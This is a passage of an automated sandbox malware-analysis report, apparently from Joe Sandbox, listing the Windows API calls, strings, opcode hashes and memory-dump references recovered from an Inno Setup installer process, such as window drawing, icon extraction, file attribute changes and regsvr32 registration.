                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3985193851-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00481499
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(000D023E,00000496,00002710,00000000), ref: 0048151F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • DeinitializeSetup, xrefs: 00481395
                                                                                                                                                                                                                                                                                                                                                                  • GetCustomSetupExitCode, xrefs: 00481339
                                                                                                                                                                                                                                                                                                                                                                  • Restarting Windows., xrefs: 004814FA
                                                                                                                                                                                                                                                                                                                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                                                                                                                                                                                                                                                                                                                  • Deinitializing Setup., xrefs: 004812FA
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3817813901-1884538726
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                                                                                                                                                                                                                                  • String ID: c:\directory$k H$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3376378930-433663191
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F59F
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0042F5A7
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                                                                                                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: TWindowDisabler-Window
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3167913817-1824977358
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7ee3fb80de1fa46ff8855e30358d0e0393f3e91d59edec71fc45dd55ca6f9eb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ee3fb80de1fa46ff8855e30358d0e0393f3e91d59edec71fc45dd55ca6f9eb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00461A97
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                                                                                                                                                                                                                                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                                                                                                                                                                                                                                                                                                  • 7712D120.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ActiveWindow$7712BrowseD120FolderInitializeMalloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3129831556-3554254475
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 91aa1e575359a2533a0b1f7d511e218a3f759194523a1360925dab01496aa42e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91aa1e575359a2533a0b1f7d511e218a3f759194523a1360925dab01496aa42e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                                                                                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 884541143-1710247218
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c5c3265b8dd7af47347773660ff2acf40ef0d407e2123e14079c182a1610a84
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c5c3265b8dd7af47347773660ff2acf40ef0d407e2123e14079c182a1610a84
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-3516654456
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 51387b376403b20f136af879f8535967482cdd16e59757bfc346a7718098ee24
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51387b376403b20f136af879f8535967482cdd16e59757bfc346a7718098ee24
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$StretchText
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2984075790-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CloseDirectoryHandleSystem
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
• Opcode ID: b643e5de385edbdcc6bab2e2ff9854c2f836b6f38382a1c8e34e12865b2a6b00
• Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
• Opcode Fuzzy Hash: b643e5de385edbdcc6bab2e2ff9854c2f836b6f38382a1c8e34e12865b2a6b00
• Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
Uniqueness

Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
• GetSysColor.USER32(00000014), ref: 0044D1C0
• SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
• OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
• GetSysColor.USER32(00000010), ref: 0044D212
• SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
• DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Text$Color$Draw$OffsetRect
• String ID:
• API String ID: 1005981011-0
• Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
• Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
• Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
• Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B755
• 73E9A570.USER32(?), ref: 0041B761
• 73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
• 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
• 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
• 73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: E98830$A570A6310E922Focus
• String ID: k H
• API String ID: 184897721-1447039187
• Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
• Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
• Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
• Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041BA27
• 73E9A570.USER32(?), ref: 0041BA33
• 73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
• 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
• 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
• 73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: E98830$A570A6310E922Focus
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 184897721-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
